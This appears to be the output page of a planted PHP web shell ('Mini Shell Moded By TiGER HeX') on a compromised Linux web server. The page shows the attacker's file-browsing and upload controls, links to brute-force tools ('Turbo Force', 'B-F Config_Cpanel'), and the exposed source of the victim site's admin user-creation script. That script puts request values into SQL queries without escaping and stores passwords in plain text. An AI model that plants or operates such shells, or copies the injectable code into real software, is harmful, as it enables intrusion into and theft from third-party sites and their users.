Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
50mmla
/
admin
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/50mmla/admin/userAdd.php
<? include_once('../includes/static/configure.php'); include_once('../includes/static/util.php'); include_once('../includes/static/dbcon.php'); include_once('../includes/static/gdimg.php'); include_once('../includes/static/sessions.php'); include_once('includes/static/util.php'); include_once('includes/appTop.php'); $page_id = str_replace(".php","",basename($_SERVER['PHP_SELF'])); if(!has_permission($page_id)){ die("You don't have permission to view this page!"); } ?> <? $html = ""; if(isset($_REQUEST['register'])){ $email = $_REQUEST['email']; $url = $_REQUEST['website']; $uname = $_REQUEST['username']; $password = $_REQUEST['password']; $user_type = $_REQUEST['userType']; $profile = get_html_text($_REQUEST['profile']); $ip = get_client_ip(); $cur_file = $_FILES['file']['name']; $cur_temp = $_FILES['file']['tmp_name']; $cur_mime = $_FILES['file']['type']; $cur_size = $_FILES['file']['size']; $cur_error = $_FILES['file']['error']; //first check for unique name $sql = "SELECT user_id FROM 50mm_users WHERE username ='$uname'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } if($db->sql_numrows($result) < 1){ //username is unique so add this user //store profile image on the server $unique_name = ""; $valid = validate_content($cur_error,$cur_mime,$cur_size,$cur_file,PROFILE_MAX_KB); if($valid['result']){ $type = explode("/",$cur_mime); $cur_type = trim($type[0]); $unique_name = get_unique_filename($cur_file); $image_info = getimagesize($cur_temp); //check to see if image needs resizing if(($image_info[0] > PROFILE_IMG_WIDTH) || ($image_info[1] > PROFILE_IMG_HEIGHT)){ //create image res $gd = new gd_img($cur_mime,$cur_temp); if(!$gd->img_id){ die($gd->gd_error);} //scale image $id = $gd->gd_scale_img(PROFILE_IMG_WIDTH,PROFILE_IMG_WIDTH,IMG_QUALITY); if(!$id){ die($gd->gd_error);} //create image $res = $gd->gd_create_img($id,ROOT_DIR.PROFILE_IMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} }else{ if (!copy($cur_temp, ROOT_DIR.PROFILE_IMG_DIR.$unique_name)) { die("Failed Image Upload"); } } } $sql = "INSERT INTO 50mm_users (user_type,email,username,password,image,profile,url,ip,verified,entry_time) VALUES ('WEB','$email','$uname','$password','$unique_name','$profile','$url','$ip',1,NOW())"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } if($user_type != 'WEB'){ $sql = "SELECT LAST_INSERT_ID() AS id"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); $id = $row['id']; $sql = "INSERT INTO 50mm_permissions (user_id) VALUES ('$id')"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } } $html = "<div class=\"hilite\">operation successful</div>"; }else{ $html = "<div class=\"error\">username is not unique</div>"; } } ?> <? include_once('includes/header.php'); //content ?> <br> <script>registerDivs = new Array('username','email','password');</script> <form action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,registerDivs,'errorRegister');"> <table cellspacing="0" cellpadding="4" border="0"> <tr> <td colspan="2"><span class="title">ADD USER</span><br> MAKE SURE YOU REMEMBER THE PASSWORD. AFTER A PERSON IS REGISTERED YOU WILL NOT BE ABLE TO EDIT THEIR PASSWORD INFO AND THEY WILL NOT BE ABLE TO RETRIEVE IT.</td> </tr> <tr> <!--<td>User Type</td> <td> <select name="userType"> <option value="WEB">WEB</option> <option value="EDITOR">EDITOR</option> <option value="ADMIN">ADMIN</option> </select>--> </td> </tr> <tr> <td>Email<span id="erremail" class="error" style="visibility:hidden;"> *</span></td> <td><input type="text" name="email" value="" class="field" maxlength="120"></td> </tr> <tr> <td>Username<span id="errusername" class="error" style="visibility:hidden;"> *</span></td> <td><input type="text" name="username" value="" class="field" maxlength="30"></td> </tr> <tr> <td>Password<span id="errpassword" class="error" style="visibility:hidden;"> *</span></td> <td><input type="password" name="password" value="" class="field" maxlength="30"></td> </tr> <tr> <td>Website <em>(optional)</em></td> <td><input type="text" name="website" value="http://" class="field"></td> </tr> <tr> <td>Profile Image <em>(optional)</em></td> <td><input type="file" name="file" class="field"></td> </tr> <tr valign="top"> <td>Profile Text <em>(optional)</em></td> <td><textarea class="body" name="profile" style="width: 400px; height: 200px;"></textarea></td> </tr> <tr> <td> </td> <td> <input name="register" type="submit" class="button" value="Regsiter"><br> <div id="errorRegister" class="error" style="visibility:hidden;">Please correct the fields marked by *</div> </td> </tr> </table> </form> <?echo $html?> <? /* //set active $sql = "SELECT user_id,username,password,email,image,profile,url,banned,ip,entry_time FROM 50mm_users WHERE user_type='$user_type'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $modrows = Array(); while ($row = $db->sql_fetchrow($result)){ $id = $row['user_id']; $row['url'] = get_trim_string($row['url'],30); $xtras = Array( "edit"=>"<a href=\"".$_SERVER['PHP_SELF']."?userId=$id&action=edit\">edit</a>", "delete"=>"<a href=\"".$_SERVER['PHP_SELF']."?userId=$id&action=delete\">delete</a>" ); unset($row['user_id']); $all = array_merge($row,$xtras); array_push($modrows, $all); } echo(get_table($modrows)); */ ?> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>